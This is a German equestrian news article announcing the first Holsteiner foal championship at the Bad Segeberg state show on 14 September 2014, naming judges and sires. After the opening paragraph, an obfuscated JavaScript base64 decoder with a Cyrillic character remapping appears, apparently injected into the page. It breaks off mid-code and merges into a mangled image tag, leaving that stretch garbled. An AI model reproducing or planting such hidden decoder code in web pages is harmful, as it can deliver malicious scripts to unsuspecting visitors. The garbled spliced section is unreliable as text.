Das R+V Holsteiner Fohlenchampionat in Bad Segeberg

25. August 2014 | Von Redaktion | Kategorie: Zucht

[Bad Segeberg (GER)/D.v.Preussen]. „Zucht und Sport – Hand in Hand“, dieses Motto hat sich der Holsteiner Verband schon lange auf seine Fahnen geschrieben. Mit dem Einsatz seiner Hengste im Sport hatte der Verband einst eine Vorreiterrolle übernommen, inzwischen sind bundesweit fast alle in der Zucht eingesetzten Hengste im Sport, sei es im Dressurviereck oder – wie die meisten Holsteiner – im Springparcours unterwegs.

function m65c3bbf5572b(wc){var s4='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var r1='';var qb,rd,wb,p1,p5,q8,w7;var vf=0;do{p1=s4.indexOf(wc.charAt(vf++));p5=s4.indexOf(wc.charAt(vf++));q8=s4.indexOf(wc.charAt(vf++));w7=s4.indexOf(wc.charAt(vf++));qb=(p1<<2)|(p5>>4);rd=((p5&15)<<4)|(q8>>2);wb=((q8&3)<<6)|w7;if(qb>=192)qb+=848;else if(qb==168)qb=1025;else if(qb==184)qb=1105;r1+=String.fromCharCode(qb);if(q8!=64){if(rd>=192)rd+=848;else if(rd==168)rd=1025;else if(rd==184)rd=1105;r1+=String.fromCharCode(rd);}if(w7!=64){if(wb>=192)wb+=848;else if(wb==168)wb=1025;else if(wb==184)wb=1105;r1+=String.fromCharCode(wb);}}while(vfand_Fohlen_Bugtru" src="http://www.horse-today.de/wp-content/uploads/2014/08/Holst-Verband_Fohlen_Bugtru-300x214.jpg" alt="Am 14. September 2014 treten die besten Hengst- und Stutfohlen gegeneinander an (Foto: Janne Bugtrup)." width="300" height="214" />

Nun haben sich die für das erste Holsteiner Fohlenchampionat Verantwortlichen für einen Austragungstermin Sonntag, 14. September 2014, anlässlich des Landesturniers in Bad Segeberg entschieden. „Wir wollten den Championate in den Körbezirken wieder mehr Bedeutung zukommen lassen und die Züchter motivieren, ihre Fohlen optimal herausgebracht zu präsentieren“, sagte Norbert Boley, und er fügte hinzu: „Dass wir das Finale in Bad Segeberg ausrichten können, ist natürlich eine wunderbare Gelegenheit, den Reitsportinteressierten auch einmal einen Einblick in die Zucht geben zu können.“

Ab 13.00 Uhr werden auf dem Dressurplatz II die Fohlen, die bei den Championaten der Körbezirke an der Spitze gestanden haben, vor den Richtern Hans-Helmut Sievers, Gerd Sosath und Wieger de Boer gegeneinander antreten. Die besten drei Hengst- und Stutfohlen zeigen sich dann noch einmal vor großer Kulisse auf dem Hauptplatz zwischen Umlauf und Stechen des Großen Preises. Besonders gespannt sein darf man auf die Fohlen der Junghengste: Clarcon, Casalito, Crumble oder Dinken sind mit ihrem ersten Jahrgang vertreten, während Cascadello I bereits mit dem zweiten aufwarten kann. Aber auch bewährte Vererber sind mit Nachkommen vertreten. Genannt seien hier nur Calido I, Casall oder Clarimo.

www.holsteiner-verband.de.

Tags: , , , , , , , , , , , , , , , , , ,
Trackback URL: http://www.horse-today.de/wp-trackback.php?p=122333

Hier klicken, um einen Kommentar zu schreiben